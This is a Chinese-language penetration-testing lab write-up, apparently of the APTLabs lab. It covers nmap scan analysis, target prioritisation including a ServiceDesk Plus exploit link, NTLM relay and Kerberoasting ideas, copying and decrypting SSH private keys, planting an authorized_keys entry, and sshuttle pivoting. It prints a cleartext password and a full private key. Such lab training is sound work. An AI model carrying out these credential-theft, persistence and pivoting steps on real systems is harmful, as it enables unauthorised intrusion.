  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 18 IP addresses (18 hosts up) scanned in 1282.10 seconds
  sshuser@nextcloud:~/saomiao$ 
  

8. 分析结果

根据Nmap的扫描结果，以下是一些关键发现和潜在的可利用点，按主机IP地址分类：

1. 192.168.5.13, 192.168.5.21, 192.168.5.62, 192.168.5.74

• SSH (端口 22): 运行 OpenSSH 7.5。这是一个相对较旧的版本（当前稳定版通常在9.x），可能存在已知的漏洞。建议查找针对OpenSSH 7.5的具体漏洞（CVEs）。

• HTTP? (端口 80): Nmap无法明确识别此服务，但它开放了HTTP端口。这需要进一步探测，例如使用浏览器访问 http://<IP>，或使用nikto、gobuster等工具扫描Web服务器配置错误、已知漏洞或隐藏目录。

• DNS (端口 53): 通用DNS响应，未识别具体软件。除非存在配置错误（如允许区域传输），否则利用可能性较低，但仍值得关注。

• SSH 密钥重复: 192.168.5.13 和 192.168.5.21 使用相同的SSH主机密钥。这通常发生在虚拟机克隆后未重新生成密钥，虽然不是直接漏洞，但表明网络管理可能存在疏忽。

2. 192.168.5.88, 192.168.5.231, 192.168.5.242, 192.168.20.1

• DNS (端口 53): 运行 Unbound DNS 服务器。需要确定具体的Unbound版本，并查找该版本相关的已知漏洞或错误配置（例如，是否是开放解析器，易受缓存投毒攻击等）。

3. 192.168.20.15 (Windows)

• HTTP (端口 80, 5985): 运行 Microsoft HTTPAPI httpd 2.0。端口5985通常用于WinRM（Windows Remote Management）。如果WinRM开启且配置不当（例如使用基本认证或允许未加密通信），可能被利用。默认的"Not Found"页面信息量不大。

• HTTPS? (端口 443): 服务未识别，需要进一步探测。尝试用浏览器访问 https://192.168.20.15。

• Unknown (端口 49443): 未知服务，需要进一步探测。

4. 192.168.20.31 / 172.17.0.1 (Linux - Ubuntu, 可能是Docker容器或同一主机)

• SSH (端口 22): OpenSSH 8.9p1 (Ubuntu)。这是一个较新的版本，重大漏洞可能性较小，但仍需关注具体的Ubuntu补丁级别。

• SMTP (端口 25): Postfix smtpd。检查是否存在开放中继（Open Relay）漏洞或版本特定漏洞。

• DNS (端口 53): PowerDNS Authoritative Server 4.1.11。这是一个较旧的版本，请查找针对 PowerDNS 4.1.x 的已知漏洞。

• HTTPS (端口 443): Apache httpd 2.4.52 (Ubuntu)。检查此Apache版本的已知漏洞和配置问题（例如，TLS/SSL配置弱点）。

• HTTP (端口 5000): Apache httpd 2.4.41 (Unix)。这是一个更旧的Apache版本，存在已知漏洞的可能性更高。http-methods脚本发现启用了TRACE方法，这可能导致跨站追踪（Cross-Site Tracing, XST）攻击。

• RTSP/HTTP (端口 8000): Nmap识别为RTSP，但服务器返回HTTP 404错误。这可能是配置错误的Web服务或其他服务。需要手动检查 http://<IP>:8000 或使用其他工具探测。

• HTTPS (端口 8080): Python BaseHTTPServer / PowerGSLB 1.7.3，运行在 Python 2.7.5 上。Python 2.7 已停止支持 (End-of-Life)，存在大量已知安全风险。PowerGSLB本身也可能存在漏洞。SSL证书已过期（2021年过期）且是自签名的。这是一个高风险服务。

• JetDirect? (端口 9100): 通常用于网络打印机。如果配置不当，可能被利用（例如发送打印任务、访问设备信息等）。

• SSH 密钥重复: 这两个IP共享相同的SSH密钥，进一步证实它们可能是同一台物理或虚拟主机。

5. 192.168.21.123 (Windows)

• HTTPS (端口 443): 运行 ManageEngine ServiceDesk Plus。
  
  ServiceDesk Plus 是一种服务管理解决方案，它结合了 ITSM 基本要素、IT 资产管理 （ITAM） 和具有企业服务管理 （ESM） 功能的 CMDB。ServiceDesk Plus 是寻求可扩展、安全且可扩展的 IT 和企业服务管理解决方案且投资回报率成比例的组织的理想选择。
  
  这是IT服务管理软件，通常是高价值目标，并且历史上存在许多严重漏洞 (如 RCE, SQLi, Auth Bypass)。虽然Nmap未能识别确切版本，但这是首要调查目标。务必搜索针对 ServiceDesk Plus 的最新漏洞和默认凭证。其SSL证书自签名且有效期长达100年，表明可能配置不规范。
  
  直接goo搜索manageengine servicedesk plus exploit
  存在CVE-2021-44077
  https://github.com/horizon3ai/CVE-2021-44077
  

• microsoft-ds? (端口 445): SMB服务。smb2-security-mode脚本显示“Message signing enabled but not required”。这是一个严重的安全风险，因为它允许NTLM中继攻击。攻击者可能截获或诱导用户向该服务器认证，然后将认证凭据中继到其他需要签名但不强制签名的机器（或LDAP/HTTP等服务），从而冒充用户身份。

• HTTP (端口 5985): Microsoft HTTPAPI httpd 2.0 (WinRM)。结合SMB签名未强制，可以通过NTLM中继攻击获取权限后利用WinRM进行横向移动。

6. 192.168.20.10 (Windows - Domain Controller)

• DNS (端口 53): Simple DNS Plus。查找此软件特定版本的漏洞。作为DC的DNS服务，错误配置可能导致严重问题。

• Kerberos (端口 88): Microsoft Windows Kerberos。可能存在Kerberoasting风险（如果服务账户密码较弱）。

• LDAP (端口 389, 3268) / LDAPS (端口 636, 3269): Active Directory LDAP服务。检查是否允许匿名绑定（Anonymous Bind）进行信息枚举（用户名、组等）。如果获得凭据，LDAP是获取域信息的关键入口。

• SMB (端口 139, 445): smb2-security-mode脚本显示“Message signing enabled and required”。这是正确的安全配置，可以有效防御针对该DC的NTLM中继攻击。

• MS RPC (端口 135, 593 及多个高端口): 检查是否有已知的RPC漏洞。

• HTTP (端口 5985): WinRM。获取凭据后可用于管理DC。

• kpasswd5 (端口 464): Kerberos密码修改服务。

• .NET Message Framing (端口 9389): AD Web Services。

• 概览: 这是域控制器，是网络的核心。虽然SMB配置安全，但仍需检查LDAP、Kerberos、DNS和RPC相关的配置和漏洞。

7. 172.17.0.2 (Linux?)

• DNS (端口 53): PowerDNS Authoritative Server 4.1.11。同192.168.20.31，检查漏洞。

• HTTPS (端口 443): Python BaseHTTPServer / PowerGSLB 1.7.3 on Python 2.7.5。同192.168.20.31:8080，高风险，证书已过期。

8. 172.17.0.3 (Linux?)

• RTSP/HTTP (端口 8000): 同192.168.20.31:8000，返回HTTP 404，需进一步调查。

9. 172.17.0.4 (Linux - Ubuntu)

• HTTP (端口 80): Apache httpd 2.4.29 (Ubuntu)。检查此版本漏洞。http-title为 "DataLeaks"，这是一个极大的危险信号，暗示此服务器可能故意或无意地托管了敏感数据。http-cookie-flags脚本发现 PHPSESSID cookie缺少 HttpOnly 标志，这使得会话cookie容易通过跨站脚本（XSS）攻击被盗取。

• MySQL (端口 3306): MySQL 5.7.26。检查是否存在弱密码、默认密码（如 root/root, root/password 等）或该版本的已知漏洞。

10. 172.17.0.5 (Linux?)

• HTTP (端口 80): Apache httpd 2.4.41 (Unix)。同192.168.20.31:5000，检查漏洞，TRACE方法已启用。

11. 172.17.0.6

• 所有端口都处于filtered状态，Nmap无法判断端口是开放还是关闭，通常意味着有防火墙阻止了探测。

潜在的可利用漏洞优先级和建议:

1. 高优先级:

   • 192.168.21.123 (ManageEngine ServiceDesk Plus & SMB Signing Not Required):

     • 行动: 重点研究ServiceDesk Plus的历史漏洞，尝试识别具体版本并查找Exploit DB等资源。利用SMB签名未强制进行NTLM中继攻击测试（需要结合其他工具如responder和ntlmrelayx）。

   • 172.17.0.4 (DataLeaks, Missing HttpOnly, MySQL):

     • 行动: 立即检查 http://172.17.0.4 的内容。尝试对MySQL进行密码猜测/爆破。寻找网站上的XSS漏洞以利用缺失的HttpOnly标志。检查Apache 2.4.29的漏洞。

   • 192.168.20.31:8080 / 172.17.0.1:8080 / 172.17.0.2:443 (Python 2.7 EOL):

     • 行动: 查找针对PowerGSLB 1.7.3和Python 2.7的已知漏洞。检查是否存在命令注入或其他Web应用漏洞。

   • 192.168.20.10 (Domain Controller):

     • 行动: 尝试LDAP匿名绑定枚举。使用如Kerbrute等工具进行Kerberoasting用户枚举和测试。检查Simple DNS Plus漏洞。

2. 中优先级:

   • 192.168.20.31:5000 / 172.17.0.1:5000 / 172.17.0.5:80 (Apache 2.4.41, TRACE enabled): 检查Apache漏洞，尝试XST攻击。

   • 192.168.20.31:53 / 172.17.0.1:53 / 172.17.0.2:53 (PowerDNS 4.1.11): 查找并测试已知漏洞。

   • 多台主机的 OpenSSH 7.5: 查找并测试已知漏洞（如用户枚举 CVE-2018-15473，虽然利用有限）。

   • 未识别的服务 (e.g., 192.168.20.15:443, 192.168.20.15:49443, 192.168.20.31:8000): 使用更专门的工具（nc, telnet, curl, nikto, dirb/gobuster）进行深入探测。

3. 低优先级/信息类:

   • SMB签名在DC上强制执行（良好）。

   • Windows主机上的WinRM端口（需要凭据）。

   • 重复的SSH密钥（网络配置问题）。

   • 过期的SSL证书（安全习惯不良，可能用于MITM）。

下一步建议:

• 版本漏洞查询: 对识别出的具体软件版本（Apache, OpenSSH, PowerDNS, MySQL, Python, ServiceDesk Plus, Simple DNS Plus等）使用 searchsploit 或在线漏洞数据库（如CVE Mitre, NIST NVD）进行查询。

• Web 应用扫描: 对所有HTTP/HTTPS端口（80, 443, 5000, 8000, 8080, 5985）运行Web漏洞扫描器（如 Nikto, OWASP ZAP, Burp Suite）。特别关注172.17.0.4和192.168.21.123。

• 凭据攻击: 对SSH, MySQL, WinRM, ServiceDesk Plus尝试使用常见/默认凭据进行登录测试。

• NTLM 中继: 在192.168.21.123上测试NTLM中继。

• LDAP/Kerberos: 在192.168.20.10上尝试LDAP枚举和Kerberoasting。

• 手动探测: 对Nmap未能识别的服务端口进行手动连接和探测。

请记住，在进行任何可能具有攻击性的测试之前，务必确保你拥有合法的授权。祝你的网络安全实验顺利！

三、内网隧道与代理设置

1. 隧道化的必要性

• 为了能在kali中直接访问内网资源

• 避免因多次连接增加被发现的风险

• 建立稳定的连接通道，便于进一步渗透

2. SSH密钥准备与格式转换

• 先将靶机中的rsa公钥和私钥都传到本地
  

  ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
  └─# scp sshuser@10.10.110.74:/home/sshuser/.ssh/id_rsa* ./
  sshuser@10.10.110.74's password: ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr
  id_rsa                                                                                      100% 1766     2.0KB/s   00:00    
  id_rsa.pub                                                                                  100%  399     0.6KB/s   00:00    
  ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
  └─# ls -liah id_rsa*
  3147102 -rw------- 1 root root 1.8K  4月 8日 03:16 id_rsa
  3147380 -rw-r--r-- 1 root root  399  4月 8日 03:16 id_rsa.pub
  

• 将发现的RSA密钥转换为OpenSSH格式
  
  执行操作对一个加密的 RSA 私钥（id_rsa）使用 ssh-keygen -p 命令进行解密（移除密码），
  并成功转换为了新的 OpenSSH 格式的私钥。
  

  -----BEGIN RSA PRIVATE KEY-----
  Proc-Type: 4,ENCRYPTED
  DEK-Info: AES-128-CBC,C373000CFD54B3F4508922250C171ED4
  
  mGPS7QR4zX5++D5HVla7VzvT4cUtMFDV/jWdnL6sGI9ne5Ft7CqqJGKayJrCD115
  8AYLM3JZqtKBHDhffntvlYeErQCS5QiGAUwPEw6FpfA1rYBm6yMMYkUxOh1FOcGD
  vNm91sOA6xlN1uqN1lEU97rgMTZW3cuuAk1mL+VyJ+cH8KmCVxhnDIJ+YIUbMI13
  UN/dY0B3x7tljsLPmOzJqEShXwTPqwW9Iebg5jdPMCRz/XUf3Jsm4NQ924+EC8K/
  nmsFou94k7ofL4nMLVvf3ZZQv6xTNR4W6zPiCpwASX+r36zJgxPfUyvQUYPAX9Xf
  pRWlj9nTQ8ui7aKnLnDpMX826uvHuYyWILIpp2LNMjMoBAqy3tqgBWbyXH2zeBff
  6m8ShHyAAXRzJBE+CKiBGPUamINsUVnYZCFco33NkW0XLrFN83/pYoYsm+sQsOgt
  zcaH8EcO6uUCtpVLCdr/nWw9mZG+FwtWIe9CtZmP1MT+DO5Wpkes6T90k67W18yz
  wqE0JWNcTv2tJZAtEN2pBZkcMAorLuZuyQieQ4y2WM5I1d8wpK3aGleMStrUvWer
  oXMWlL4eQK9E/apzs0wdDNf6ZCKIRSiQ75r1mydj3DTbQCywH+4TUcRLTo4XMlwo
  A9fNZtliPNrY0RUgJOq4Id4O/RKkysp3JrSLH8rC8sUFWXXajZxC43t5ky1uF8vo
  ML7NJI3bymEEaG58rvUlfcBoGcjjJKw+NKuv6CPQkqP69LPNtjoJxOczrPCvzDJj
  2mZpForsr1wMMbjjzNur0txBRUHEsoYiRwM/2Fwjbvij4szGOEvV3ensGc2hrDzz
  SfwnqBJ2/7O5jB3CVa8jk1klDjWdi9P3yG1IvJytQzMSg/m7GV0j3oYQt253AqSL
  qSazpfpL5qjtI20sylLyc8T1B/Fs97qqSgxE6I3pS5Jp59BmW95P1bZqq+lfBZB+
  odTNyB7uSW+bCnLmChKKYoVb0ZbhnYUmoHxvKuXM4gWWsIjbLvmD8ZhZuQiDbRD/
  5sJfltEAntIShDzJ76SSpk6J9mzK21sngaGRJZuIWaDjnBM0zjoqc0MiTXoxFlwI
  uq/2Jre8oSY+qD9xP2+uaGDKCMFxjcG+bm626W5KPyOPUIyn/DfpoC4DgDPlzncU
  /tKHaxTxcIsrZ+Vfn+D9IixHovJc21kvSTYpN7U7h3CCLRd3GWOkeO1hw+PPZrLF
  bANQ9qSJbvBW9+KlaKxZAnAlIUZqHG29EJABE2HwxWw+RUy3h32LrP3TyYzLikL2
  xnqgEAKq9y6AUarxKObRNWu/ytb9IO4LzeXEtFGwxcSZZ6sFShVJ79TzwA7fH5Ei
  vgNNtyOHtmH6wEvRz9bKpis9MHDeKjOCvHF7HqqIGw4CwZ4N8Y+N4zwHu3X2EPP/
  0E15Y+yBjNSpdV21M5lLtv9jqCTF8UoGZGqhyLN+E0zpNu1ZDLV7PA13S55OHr9d
  6zTf5H5dzCH42HUccp/1Krj0t0KqFKeEzy5WmvHFP2hpP+jlNjz7rWJVdh7lCi/f
  IeMfaTX5FRkY0MPLRmbS87s7WRuPMkJtmoqeJXNj91k2LqL8UPcA9cJeqkfCyy/M
  -----END RSA PRIVATE KEY-----

  这个是老式的 PEM 格式，并且是加密的。
  
  
  ssh-keygen -p -o -f id_rsa

  这条命令做了几件事：

  -p：修改密码（这里你输入了旧密码并设置了新密码或留空）。

  -o：将私钥转换为新的 OPENSSH 格式。

  -f id_rsa：指定私钥文件。

• 移除私钥的密码保护，便于自动化
  

  ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
  └─# ssh-keygen -p -o -f id_rsa 
  Enter old passphrase: 
  Enter new passphrase (empty for no passphrase): 回车
  Enter same passphrase again: 回车
  Your identification has been saved with the new passphrase.
  

  在提示新密码时留空（直接回车两次），那就表示你已经移除了密码，现在的私钥是未加密状态。
  
  转换成功后的新私钥

  -----BEGIN OPENSSH PRIVATE KEY-----
  b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
  NhAAAAAwEAAQAAAQEAlTNnzOqLuVDiS9JOSf8BfkE1P8vXkdCO/R35dPONVy3ttDE5v8ks
  8gwI2KyaKc6aUkVTbu2CpXVgTP2qRhna1ptXEQbV/eMAUsq+CxoHk4sL/AoY/Ynx2qr7YQ
  7lnZUxxctajKx+QryQak5gz//bKFeoVJfPZ+CrI/KjPiuWG+pVXal2v1bRpefB+cRMfF0Y
  USbwofFQG5X91DRx4ig7XKbr9sRhp0QE3KpS7W/j+TScT7+nsxpGHaMWTx88A9xnIfeFpb
  3vteZN7dhCrxVVbeDn8bKrvSruPgQU5D6g7NmOvzYGPiBrTzqTRwjVKXfIPEmmeE7rW8gl
  13dREnu/FwAAA7j2o5WT9qOVkwAAAAdzc2gtcnNhAAABAQCVM2fM6ou5UOJL0k5J/wF+QT
  U/y9eR0I79Hfl0841XLe20MTm/ySzyDAjYrJopzppSRVNu7YKldWBM/apGGdrWm1cRBtX9
  4wBSyr4LGgeTiwv8Chj9ifHaqvthDuWdlTHFy1qMrH5CvJBqTmDP/9soV6hUl89n4Ksj8q
  M+K5Yb6lVdqXa/VtGl58H5xEx8XRhRJvCh8VAblf3UNHHiKDtcpuv2xGGnRATcqlLtb+P5
  NJxPv6ezGkYdoxZPHzwD3Gch94Wlve+15k3t2EKvFVVt4Ofxsqu9Ku4+BBTkPqDs2Y6/Ng
  Y+IGtPOpNHCNUpd8g8SaZ4TutbyCXXd1ESe78XAAAAAwEAAQAAAQBodquQwA/AWq93IvKJ
  wLAM9B8SYei3QW08MAZ/Kh+mEJRD+8tRSsvbVS3Ed2UhLHTEcaGvI0C8FGiuv1S+7E9avz
  zAwSaHMq8BSM6y+zCez1Y+y9sfebwKvHhxRnriUJmewXjO0d89XsVGiUYjnCKYJnfHcttX
  AekRrEs7tkzNkb0n/42blq2yxGTmnPOsg+DzpXyoIF+mbD6Tx7JBhwsLU0DrMpz2hVrsD5
  PxWxXX9dPs6JBwpT3CNQER/HceIcIPzNaDgnnyF24Yw7nB8vZLyZYv7skV57ld4io+yC2u
  GUvbSL/FaEGcG1GJghwKv8b1F4ZijyTQzF8srmav0PsxAAAAgGP4ijO/zdfUAzxwKHt0KE
  QIBCQxaMOQ/J21Xx8jcoNz3xlT50ZiVIYHP5VF/FFLAU9wXUGTlQ4PYAeQJ6jqzBwDvIhz
  8G68z5Te98m2wtccmQ1qz/JVTDlUdRITGcWHaaEn0LKKMF/v4VwUQyDBb5QjuO27HgNd5A
  IZLT6GAV0kAAAAgQDG2hDfj8fR9TGX9CN9wyAOMDpDfhZUMiYfOjhEteSUt1z1cJgGMekQ
  HBvO97fz+Ms841GhJc28kca95KF1egW0WEI5jJ4VtJB7hRuTL+S+6P7CF74sbpWXFS73e4
  ZK8/HDhIWbuRepcCTGbehUCZbq+iL4OYjxu1ShRXbKkL5iJQAAAIEAwBRptNwjngmsq6PO
  V5HAoT7H9utjxbOQ+y1e5yvgrO/P5z8FUHBmOpUus3GF3U5UkyBDDzcMefkEGw1Yn8Wbjz
  fpXswSgnHNFBiAD4wmx1Te7F4bJKp87j4Aggnfu4Jj09FXnTicwKRa3uiSXTDRPp54bX6O
  O5f8ng+IbFy4EYsAAAAAAQID
  -----END OPENSSH PRIVATE KEY-----

  
  这里我们把这个id_rsa改个名字，改成nextcloud.key
  

• 将公钥添加到authorized_keys文件中实现免密登录
  
  —— 思路就是 ——
  通过 sshpass 使用密码方式登录 10.10.110.74 的 sshuser 用户，
  然后把他自己的公钥添加到 authorized_keys，
  从而实现以后用私钥免密登录。
  
  平时一般是这样登录的

  ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
  └─# sshpass -p 'ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr' ssh sshuser@10.10.110.74
  Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-116-generic x86_64)
  
   System information as of Tue Apr  8 07:42:12 AM UTC 2025
    System load:  0.0                Processes:               286
    Usage of /:   78.3% of 12.22GB   Users logged in:         1
    Memory usage: 20%                IPv4 address for ens160: 192.168.20.31
    Swap usage:   0%
  Expanded Security Maintenance for Applications is not enabled.
  
  36 updates can be applied immediately.
  31 of these updates are standard security updates.
  To see these additional updates run: apt list --upgradable
  
  Enable ESM Apps to receive additional future security updates.
  See https://ubuntu.com/esm or run: sudo pro status
  
  The list of available updates is more than a week old.
  To check for new updates run: sudo apt update
  Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
  
  Last login: Tue Apr  8 03:29:54 2025 from 10.10.16.111
  sshuser@nextcloud:~$ 

  
  一条命令搞定，写公钥添到authorized_keys
  
  ssh进去之后执行cat /home/sshuser/.ssh/id_rsa.pub >> /home/sshuser/.ssh/authorized_keys

  ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
  └─# sshpass -p 'ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr' ssh sshuser@10.10.110.74 'cat /home/sshuser/.ssh/id_rsa.pub >> /home/sshuser/.ssh/authorized_keys'

  也可以这样

  ┌──(root㉿kali)-[~/Desktop/APTLabs]
  └─# sshpass -p 'ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr' \
  ssh-copy-id -f -i /root/Desktop/APTLabs/credentials/id_rsa.pub sshuser@10.10.110.74
  
  /usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: "/root/Desktop/APTLabs/credentials/id_rsa.pub"
  Number of key(s) added: 1
  
  Now try logging into the machine, with: "ssh -i 'sshuser@10.10.110.74'"
  and check to make sure that only the key(s) you wanted were added.

  解释：

  • -i：指定公钥路径。

  • -f：强制安装这个公钥，即使找不到对应的私钥。

  • 默认情况下，ssh-copy-id 会尝试找 id_rsa 私钥来匹配 id_rsa.pub，如果你不想用默认路径，就必须用 -f。
    

3. 验证连接

• 直接使用私钥连接

  ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key sshuser@10.10.110.74

  ┌──(root㉿kali)-[~/Desktop/APTLabs]
  └─# ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key sshuser@10.10.110.74 
  
  Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-116-generic x86_64)
   System information as of Tue Apr  8 08:26:25 AM UTC 2025
    System load:  0.07               Processes:               282
    Usage of /:   78.3% of 12.22GB   Users logged in:         1
    Memory usage: 20%                IPv4 address for ens160: 192.168.20.31
    Swap usage:   0%
  Expanded Security Maintenance for Applications is not enabled.
  
  36 updates can be applied immediately.
  31 of these updates are standard security updates.
  To see these additional updates run: apt list --upgradable
  
  Last login: Tue Apr  8 08:23:38 2025 from 10.10.16.111
  sshuser@nextcloud:~$ 

3. 使用sshuttle建立隧道

• sshuttle工具可创建透明代理隧道

• 与VPN类似但更轻量，基于SSH协议

• 设置远程路由，使内网资源在本地可见

  # 安装sshuttle
  apt install sshuttle

• 建立隧道

  sshuttle -r sshuser@10.10.110.74 192.168.20.0/24 192.168.21.0/24 -e 'ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key'

  命令作用

• -r sshuser@10.10.110.74：远程跳板机；

• -e 'ssh -i nextcloud.key'：指定使用 nextcloud.key 私钥进行免密登录；

• 192.168.20.0/24 192.168.21.0/24：这两个网段会被自动通过该跳板机转发；

• sshuttle 会设置本地的 iptables 和 route，并在后 台创建透明代理。

• c : Connected to server. 说明你的 sshuttle 隧道已经成功建立，配置完全正确，
  现在你从本机访问 192.168.20.0/24 和 192.168.21.0/24 就像在同一个内网中一样！
  

• 查看隧道日志
  

  ┌──(root㉿kali)-[~/Desktop/APTLabs]
  └─# sshuttle -vv -r sshuser@10.10.110.74 192.168.20.0/24 192.168.21.0/24 -e 'ssh -i /root/Desktop/APTLabs/credentials/nextcloud.key'
  
  Starting sshuttle proxy (version 1.3.1).
  c : Starting firewall manager with command: ['/usr/bin/sshuttle', '-v', '-v', '--method', 'auto', '--firewall']
  fw: Starting firewall with Python version 3.12.7
  fw: which() found 'iptables' at /usr/sbin/iptables
  fw: which() found 'iptables' at /usr/sbin/iptables
  fw: ready method name nat.
  c : Using default IPv4 listen address 127.0.0.1
  c : IPv6 enabled: Using default IPv6 listen address ::1
  c : Method: nat
  c : IPv4: on
  c : IPv6: on
  c : UDP : off (not available with nat method)
  c : DNS : off (available)
  c : User: off (available)
  c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
  c :   (<AddressFamily.AF_INET: 2>, '192.168.20.0', 24, 0, 0)
  c :   (<AddressFamily.AF_INET: 2>, '192.168.21.0', 24, 0, 0)
  c : Subnets to exclude from forwarding:
  c :   (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
  c :   (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
  c : Trying to bind redirector on port 12300
  c : TCP redirector listening on ('::1', 12300, 0, 0).
  c : TCP redirector listening with <socket.socket fd=5, family=10, type=1, proto=0, laddr=('::1', 12300, 0, 0)>.
  c : TCP redirector listening on ('127.0.0.1', 12300).
  c : TCP redirector listening with <socket.socket fd=7, family=2, type=1, proto=0, laddr=('127.0.0.1', 12300)>.
  c : Starting client with Python version 3.12.7
  c : Connecting to server...
  c : which() found 'ssh' at /usr/bin/ssh
  c : executing: ['/usr/bin/ssh', '-i', '/root/Desktop/APTLabs/credentials/nextcloud.key', 'sshuser@10.10.110.74', '--', '/bin/sh -c \'P=python3; $P -V 2>/dev/null || P=python; exec "$P" -c \'"\'"\'import sys, os; verbosity=2; stdin = os.fdopen(0, \'"\'"\'"\'"\'"\'"\'"\'"\'rb\'"\'"\'"\'"\'"\'"\'"\'"\'); exec(compile(stdin.read(1785), \'"\'"\'"\'"\'"\'"\'"\'"\'assembler.py\'"\'"\'"\'"\'"\'"\'"\'"\', \'"\'"\'"\'"\'"\'"\'"\'"\'exec\'"\'"\'"\'"\'"\'"\'"\'"\')); sys.exit(98);\'"\'"\'; exit 97\'']
  c :  > channel=0 cmd=PING len=7 (fullness=0)
   s: Running server on remote host with /usr/bin/python3 (version 3.10.12)
   s: assembling 'sshuttle' (30 bytes)
   s: assembling 'sshuttle.cmdline_options' (85 bytes)
   s: assembling 'sshuttle.helpers' (4154 bytes)
   s: assembling 'sshuttle.ssnet' (5745 bytes)
   s: assembling 'sshuttle.hostwatch' (2564 bytes)
   s: assembling 'sshuttle.server' (4166 bytes)
   s: latency control setting = True
   s:  > channel=0 cmd=PING len=7 (fullness=0)
   s: auto-nets:False
   s:  > channel=0 cmd=ROUTES len=0 (fullness=7)
   s: Waiting: 1 r=[0] w=[1] x=[] (fullness=7/0)
   s:   Ready: 1 r=[] w=[1] x=[]
  c : Connected to server.
  c : Waiting: 2 r=[5, 7, 9] w=[9] x=[] (fullness=7/0)
  c :   Ready: 2 r=[9] w=[9] x=[]
  c : mux read: 15
  c : <  channel=0 cmd=PING len=7
  c :  > channel=0 cmd=PONG len=7 (fullness=7)
  c : mux wrote: 15/15
  c : mux wrote: 15/15
  c : Waiting: 2 r=[5, 7, 9] w=[] x=[] (fullness=14/0)
   s: mux wrote: 15/15
   s: Waiting: 1 r=[0] w=[1] x=[] (fullness=7/0)
   s:   Ready: 1 r=[] w=[1] x=[]
   s: mux wrote: 8/8
   s: Waiting: 1 r=[0] w=[] x=[] (fullness=7/0)
  c :   Ready: 2 r=[9] w=[] x=[]
  c : mux read: 8
  c : <  channel=0 cmd=ROUTES len=0
  fw: Got subnets: [(2, 24, False, '192.168.20.0', 0, 0), (2, 24, False, '192.168.21.0', 0, 0), (2, 32, True, '127.0.0.1', 0, 0), (10, 128, True, '::1', 0, 0)]
  fw: Got nslist: []
  fw: Got ports: 12300,12300,0,0
  fw: Got udp: False, user: None, group: None, tmark: 0x01, sshuttle_pid: 8527
  fw: setting up.
  fw: setting up IPv6.
  fw: ip6tables -w -t nat -N sshuttle-12300
  fw: ip6tables -w -t nat -F sshuttle-12300
  fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300
  fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300
  fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp
  fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
  fw: setting up IPv4.
  fw: iptables -w -t nat -N sshuttle-12300
  fw: iptables -w -t nat -F sshuttle-12300
  fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300
  fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300
  fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp
  fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 192.168.20.0/24 -p tcp --to-ports 12300
  fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 192.168.21.0/24 -p tcp --to-ports 12300
  fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
  fw: which() could not find 'resolvectl' in /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools
  fw: which() could not find 'systemd-resolve' in /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools
  c : Waiting: 2 r=[5, 7, 9] w=[] x=[] (fullness=14/0)
   s:   Ready: 1 r=[0] w=[] x=[]
   s: mux read: 30
   s: <  channel=0 cmd=PING len=7
   s:  > channel=0 cmd=PONG len=7 (fullness=7)
   s: <  channel=0 cmd=PONG len=7
   s: received PING response
   s: mux wrote: 15/15
   s: Waiting: 1 r=[0] w=[] x=[] (fullness=0/0)
  c :   Ready: 2 r=[9] w=[] x=[]
  c : mux read: 15
  c : <  channel=0 cmd=PONG len=7
  c : received PING response
  c : Waiting: 2 r=[5, 7, 9] w=[] x=[] (fullness=0/0)
  

  模块	状态
  🔐 SSH连接	成功连接到 sshuser@10.10.110.74
  🐍 远程Python解释器	找到并使用 /usr/bin/python3（3.10.12）
  🔥 iptables 配置	成功添加了 192.168.20.0/24 和 192.168.21.0/24 到 NAT 规则
  🌐 IPv4 + IPv6	均已启用，重定向监听端口 12300
  🚫 错误信息	无明显错误或断连

  因为 sshuttle 并不会把 192.168.20.0/24 显式加进系统路由表
  

  ┌──(root㉿kali)-[~/Desktop/APTLabs]
  └─# ip route
  default via 192.168.100.2 dev eth0 proto dhcp src 192.168.100.100 metric 100 
  10.10.16.0/23 dev tun0 proto kernel scope link src 10.10.16.111 
  10.10.110.0/24 via 10.10.16.1 dev tun0 
  192.168.100.0/24 dev eth0 proto kernel scope link src 192.168.100.100 metric 100 
                                                                                                                                                                                   
  ┌──(root㉿kali)-[~/Desktop/APTLabs]
  └─# iptables -t nat -L -n -v
  
  Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
   pkts bytes target     prot opt in     out     source               destination         
      0     0 sshuttle-12300  all  --  *      *       0.0.0.0/0            0.0.0.0/0           
  
  Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
   pkts bytes target     prot opt in     out     source               destination         
  
  Chain OUTPUT (policy ACCEPT 6 packets, 718 bytes)
